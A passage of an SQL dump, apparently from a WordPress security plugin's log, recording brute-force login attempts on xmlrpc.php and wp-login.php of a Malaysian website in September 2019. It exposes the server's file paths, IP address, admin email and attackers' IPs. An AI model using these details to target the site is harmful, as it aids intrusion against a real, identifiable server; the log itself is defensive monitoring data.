02:42:33',17747024,19234264,'https://bintara.com.my/wp-login.php',1,0,'148.72.211.251'),(23783,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"58752\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2iiZ3S-xk3mIlSDSjSywAAAAY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568514697.6274\";s:12:\"REQUEST_TIME\";s:10:\"1568514697\";}}','notice','2019-09-15 02:31:39','2019-09-15 02:31:38',18258144,19557192,'https://bintara.com.my/xmlrpc.php',1,0,'150.164.122.1'),(23782,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"150.164.122.1\";s:11:\"REMOTE_PORT\";s:5:\"58166\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2ihrXKYz7ocPqFjcW0fwAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568514694.2901\";s:12:\"REQUEST_TIME\";s:10:\"1568514694\";}}','notice','2019-09-15 02:31:35','2019-09-15 02:31:34',17738648,19230392,'https://bintara.com.my/wp-login.php',1,0,'150.164.122.1'),(23781,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"36241\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2gDfPfj5xLH6d8s95V9AAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568514061.3144\";s:12:\"REQUEST_TIME\";s:10:\"1568514061\";}}','notice','2019-09-15 02:21:02','2019-09-15 02:21:01',18257112,19554456,'https://bintara.com.my/xmlrpc.php',1,0,'213.32.91.71'),(23780,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"87\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"213.32.91.71\";s:11:\"REMOTE_PORT\";s:5:\"35907\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2gCp3S-xk3mIlSDSjSPQAAAAU\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568514058.3548\";s:12:\"REQUEST_TIME\";s:10:\"1568514058\";}}','notice','2019-09-15 02:20:59','2019-09-15 02:20:58',17738568,19229352,'https://bintara.com.my/wp-login.php',1,0,'213.32.91.71'),(23779,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"58310\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2dkZgHXVncm@@EIY9eoQAAAFM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568513426.0684\";s:12:\"REQUEST_TIME\";s:10:\"1568513426\";}}','notice','2019-09-15 02:10:27','2019-09-15 02:10:26',18256048,19553680,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(23778,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"57700\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2djgcaemJNJACwk0QAhgAAAQw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568513422.7254\";s:12:\"REQUEST_TIME\";s:10:\"1568513422\";}}','notice','2019-09-15 02:10:24','2019-09-15 02:10:23',17736416,19226648,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(23777,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"55356\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2bIQcaemJNJACwk0T@0gAAAQk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568512802.3314\";s:12:\"REQUEST_TIME\";s:10:\"1568512802\";}}','notice','2019-09-15 02:00:05','2019-09-15 02:00:03',18256048,19553680,'https://bintara.com.my/xmlrpc.php',1,0,'80.82.122.216'),(23776,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"80.82.122.216\";s:11:\"REMOTE_PORT\";s:5:\"54524\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2bHp3S-xk3mIlSDSjQugAAAAE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568512798.6289\";s:12:\"REQUEST_TIME\";s:10:\"1568512798\";}}','notice','2019-09-15 02:00:00','2019-09-15 01:59:59',17735216,19227456,'https://bintara.com.my/wp-login.php',1,0,'80.82.122.216'),(23775,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"91.191.173.134\";s:11:\"REMOTE_PORT\";s:5:\"34642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2ZAAcaemJNJACwk0T9ZAAAARc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568512256.5751\";s:12:\"REQUEST_TIME\";s:10:\"1568512256\";}}','notice','2019-09-15 01:50:57','2019-09-15 